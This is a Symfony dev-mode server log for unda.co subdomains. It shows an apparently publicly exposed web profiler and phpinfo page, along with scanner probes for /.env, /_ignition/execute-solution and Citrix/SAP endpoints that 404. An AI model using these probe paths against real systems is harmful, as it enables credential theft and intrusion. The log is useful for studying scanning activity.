[2025-12-19 02:44:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-19 02:45:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 02:45:42] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 02:45:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 02:45:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 02:45:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 02:45:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 02:45:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 02:45:42] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 02:45:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-19 02:46:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9f9bfc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9f9bfc?panel=request","method":"GET"} []
[2025-12-19 02:46:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 02:51:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"afab25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/afab25?panel=cache","method":"GET"} []
[2025-12-19 02:51:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 02:54:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 02:54:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 02:54:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 02:54:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 02:54:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 02:54:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 02:54:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 02:54:58] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 02:56:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=twig","method":"GET"} []
[2025-12-19 02:56:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 03:05:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 03:05:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 03:06:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02668c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/02668c?panel=swiftmailer","method":"GET"} []
[2025-12-19 03:06:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 03:06:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=time","method":"GET"} []
[2025-12-19 03:06:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 03:07:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323","method":"GET"} []
[2025-12-19 03:07:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 03:11:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 03:11:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=security","method":"GET"} []
[2025-12-19 03:11:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 03:17:37] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 03:21:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
[2025-12-19 03:21:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 03:28:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=time","method":"GET"} []
[2025-12-19 03:28:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 03:29:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /logon/LogonPoint/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /logon/LogonPoint/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:29:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /logon/LogonPoint/custom.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /logon/LogonPoint/custom.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:33:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:35:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3","method":"GET"} []
[2025-12-19 03:35:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 03:39:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=config","method":"GET"} []
[2025-12-19 03:39:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 03:46:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:47:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-19 03:47:19] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a666a7","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/a666a7","method":"GET"} []
[2025-12-19 03:47:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ee3c72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ee3c72?panel=twig","method":"GET"} []
[2025-12-19 03:47:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 03:48:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=cache","method":"GET"} []
[2025-12-19 03:48:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 03:48:47] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-19 03:48:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 03:48:59] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 03:48:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 03:48:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 03:48:59] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 03:48:59] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 03:48:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 03:48:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 03:48:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 03:48:59] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 03:48:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 03:48:59] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 03:48:59] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 03:48:59] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 03:48:59] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 03:48:59] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 03:48:59] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 03:53:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"HEAD"} []
[2025-12-19 03:53:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-19 03:53:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:53:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-19 03:53:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
[2025-12-19 03:53:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:53:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 03:57:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a","method":"GET"} []
[2025-12-19 03:57:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 04:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3b202b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3b202b?panel=form","method":"GET"} []
[2025-12-19 04:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 04:03:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 04:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=config","method":"GET"} []
[2025-12-19 04:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 04:06:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"baa854","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/baa854?panel=request","method":"GET"} []
[2025-12-19 04:06:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 04:13:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 04:15:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=cache","method":"GET"} []
[2025-12-19 04:15:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 04:17:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 04:24:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=twig","method":"GET"} []
[2025-12-19 04:24:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 04:25:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30b00d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/30b00d?panel=time","method":"GET"} []
[2025-12-19 04:25:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 04:31:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
[2025-12-19 04:31:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 04:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=security","method":"GET"} []
[2025-12-19 04:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 04:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=form","method":"GET"} []
[2025-12-19 04:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-19 04:42:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=dump","method":"GET"} []
[2025-12-19 04:42:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-19 04:44:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=request","method":"GET"} []
[2025-12-19 04:44:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 04:45:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 04:47:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ea8628","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ea8628","method":"GET"} []
[2025-12-19 04:47:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
